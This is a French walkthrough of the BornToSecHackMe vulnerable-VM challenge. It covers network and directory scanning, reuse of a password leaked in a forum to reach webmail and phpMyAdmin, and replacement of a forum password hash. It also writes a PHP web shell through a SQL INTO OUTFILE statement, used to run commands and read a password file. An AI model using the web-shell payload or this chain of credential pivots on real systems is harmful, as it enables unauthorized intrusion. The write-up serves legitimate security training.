On lance la VM

On n'a pas d'informations, on cherche alors à trouver l'adresse IP de la VM

On remarque que dans les configs de la VM, on a l'adresse MAC (Réseau->avancé)

arp-scan -l             va afficher :      (pour Marie : sudo arp-scan --interface=en0 --localnet)

            Interface: en0, type: EN10MB, MAC: f0:18:98:5c:ac:dd, IPv4: 192.168.0.19
            Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
            192.168.0.30	08:00:27:16:fc:a0	PCS Systemtechnik GmbH    //*********************Correspond à l'adresse MAC
            192.168.0.18	98:09:cf:93:62:fc	OnePlus Technology (Shenzhen) Co., Ltd
            192.168.0.254	00:24:d4:a4:ee:30	FREEBOX SAS

            530 packets received by filter, 0 packets dropped by kernel
            Ending arp-scan 1.9.7: 256 hosts scanned in 1.870 seconds (136.90 hosts/sec). 3 responded

On regarde ensuite quels ports sont ouverts avec : nmap -v -A [IP]

On voit que les ports suivants sont présents :
22/tcp  open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http       Apache httpd 2.2.22 ((Ubuntu))


on essaye donc de rentrer l'ip dans le navigateur et on obtient le site

Mais on ne peut rien faire dessus

On part donc dans de grandes recherches, parmi celles-ci, on cherche à trouver les fichiers cachés du site.

Je trouve dirsearch : mais après moults essais, on n'arrive pas à le faire fonctionner, on se tourne donc vers un site proposant des équivalents :
https://blog.sec-it.fr/en/2021/02/16/fuzz-dir-tools/

Le premier proposé est dirb

Effectivement après installation avec :
            cd ~/Applications
            wget https://downloads.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
            tar -xvf dirb222.tar.gz
            rm dirb222.tar.gz
            brew install autoconf
            chmod -R 755 dirb222
            cd dirb222
            ./configure
            make
            make install

On peut lancer dirb comme suit :

dirb http://192.168.0.30/ wordlists/common.txt

On obtient alors :

            GENERATED WORDS: 4612

            ---- Scanning URL: http://192.168.0.30/ ----
            + http://192.168.0.30/cgi-bin/ (CODE:403|SIZE:288)
            ==> DIRECTORY: http://192.168.0.30/fonts/
            + http://192.168.0.30/forum (CODE:403|SIZE:285)
            + http://192.168.0.30/index.html (CODE:200|SIZE:1025)
            + http://192.168.0.30/server-status (CODE:403|SIZE:293)

            ---- Entering directory: http://192.168.0.30/fonts/ ----
            (!) WARNING: Directory IS LISTABLE. No need to scan it.
                (Use mode '-w' if you want to scan it anyway)

Dirb a scanné le site et a trouvé des répertoires cachés, le seul auquel nous avons accès actuellement est http://192.168.0.30/forum
/!\ il faut passer le site en httpS !

Quand on se connecte sur le forum, on peut voir différents sujets inutiles, et un très intéressant :
            Probleme login ? 

Quand on l'ouvre on se rend compte que ce sont des retours de commandes, parmi ceux-ci se trouve :
            Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2
            Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Received disconnect from 161.202.39.38: 3: com.jcraft.jsch.JSchException: Auth fail [preauth]
            Oct 5 08:46:01 BornToSecHackMe CRON[7549]: pam_unix(cron:session): session opened for user lmezard by (uid=1040)

on essaye donc de se connecter sur la VM mais ça ne marche pas, on essaye donc de se connecter simplement au forum :
            Id = lmezard
            mdp = !q\]Ej?*5K5cy*AJ    (la personne s'est sûrement trompée et a rentré son mot de passe en login)

Ca marche ! On arrive alors sur sa page profil et on obtient son adresse email = laurie@borntosec.net


On ne sait pas trop quoi faire de plus, on voit bien un espace Users et contact mais rien de croustillant

Etant donné que nous avons dû passer le site en https, on rééssaye la commande dirb avec le https

dirb https://192.168.0.30/ wordlists/common.txt

            GENERATED WORDS: 4612

            ---- Scanning URL: https://192.168.0.30/ ----
            + https://192.168.0.30/cgi-bin/ (CODE:403|SIZE:289)
            ==> DIRECTORY: https://192.168.0.30/forum/
            ==> DIRECTORY: https://192.168.0.30/phpmyadmin/                 //NOUVELLE PAGE
            + https://192.168.0.30/server-status (CODE:403|SIZE:294)
            ==> DIRECTORY: https://192.168.0.30/webmail/                   //NOUVELLE PAGE

            ---- Entering directory: https://192.168.0.30/forum/ ----
            + https://192.168.0.30/forum/backup (CODE:403|SIZE:293)
            + https://192.168.0.30/forum/config (CODE:403|SIZE:293)
            ==> DIRECTORY: https://192.168.0.30/forum/images/
            ==> DIRECTORY: https://192.168.0.30/forum/includes/
            + https://192.168.0.30/forum/index (CODE:200|SIZE:4935)
            + https://192.168.0.30/forum/index.php (CODE:200|SIZE:4935)
            ==> DIRECTORY: https://192.168.0.30/forum/js/
            ==> DIRECTORY: https://192.168.0.30/forum/lang/
            ==> DIRECTORY: https://192.168.0.30/forum/modules/
            ==> DIRECTORY: https://192.168.0.30/forum/templates_c/
            ==> DIRECTORY: https://192.168.0.30/forum/themes/
            ==> DIRECTORY: https://192.168.0.30/forum/update/

On essaye d'aller sur https://192.168.0.30/webmail/

On obtient une page login, on peut se connecter avec les identifiants de Laurie :
Id : laurie@borntosec.net
Mot de passe : !q\]Ej?*5K5cy*AJ

On tombe sur sa boite mail avec deux mails :
L'un d'entre eux est : DB Access et contient :

            Hey Laurie,

            You cant connect to the databases now. Use root/Fg-'kKXBj87E:aJ$

            Best regards.


Maybe sur la page https://192.168.0.30/phpmyadmin/ ?

Les identifiants ont marché, on voit qu'il y a une base de données : forum_db

La seule table qui semble intéressante c'est mlf2_userdata mais il faut trouver quel hash est utilisé
Mais nous ne trouvons pas parmi les décrypteurs connus

Après quelques recherches, on s'aperçoit que le footer contient le lien de l'hébergeur : MyLittleForum

En allant dans la partie Code et en faisant des CmdF pour trouver le 'hash', on finit par trouver leur fonction de hashage :
https://github.com/ilosuna/mylittleforum/blob/master/includes/login.inc.php

On l'a donc utilisée pour hasher un nouveau mot de passe et le remplacer dans la base de données (cf fichier testhash.php)

On peut se connecter à l'espace admin du forum !

###

En se connectant sur phpmyadmin en tant que root, on peut utiliser la fenetre de commandes sql.
Quand on regarde la structure de mylittleforum, il y a un dossier templates_c. Quand on navigue dessus, on voit plusieurs fichiers php sur lesquels on peut naviguer.
Si on arrive a creer une page php ici on pourra lui faire executer des commandes.
Dans la fenetre de commandes SQL on lance :
SELECT "<?php system($GET_['exploit']) ?>" INTO OUTFILE "/var/www/forum/templates_c/exploit.php"
Cela cree le ficher exploit.php sur lequel on peut naviguer et auquel on peut passer des commandes dans l'URL

En fouillant dans le serveur, on fini par tomber sur :
https://192.168.56.3/forum/templates_c/exploit.php?exploit=ls%20/home
LOOKATME ft_root laurie laurie@borntosec.net lmezard thor zaz
https://192.168.56.3/forum/templates_c/exploit.php?exploit=ls%20/home/LOOKATME
password 
https://192.168.56.3/forum/templates_c/exploit.php?exploit=cat%20/home/LOOKATME/password
lmezard:G!@M6f4Eatau{sF" 

Avec cet identifiant et ce mot de passe, on peut se connecter sur la VM
Dans le home de lmezard, il y a un fichier `fun` et un ficher `README` qui nous challenge a trouver la solution du probleme.

Le fichier fun comporte des strings, des noms de fichiers, etc. La string ustar revient souvent, et on en deduit que le fichier est un fichier tar.
`tar -C /tmp -xvf fun`
Et on obtient plein de fichiers. Certains comportent des strings interessantes : "getme()". On trouve :
            grep -A2 getme /tmp/ft_fun/*
les fonctions getme retournent un caractere qui est ensuite print et pour lequel on nous dit d'utiliser SHA-@%^
Certaines fonctions sont sur plusieurs fichiers, et dans ce cas il faut se ficher au numero de fichier inclu dans le contenu du fichier et regarder le ficher suivant.
On obtient : Iheartpwnge
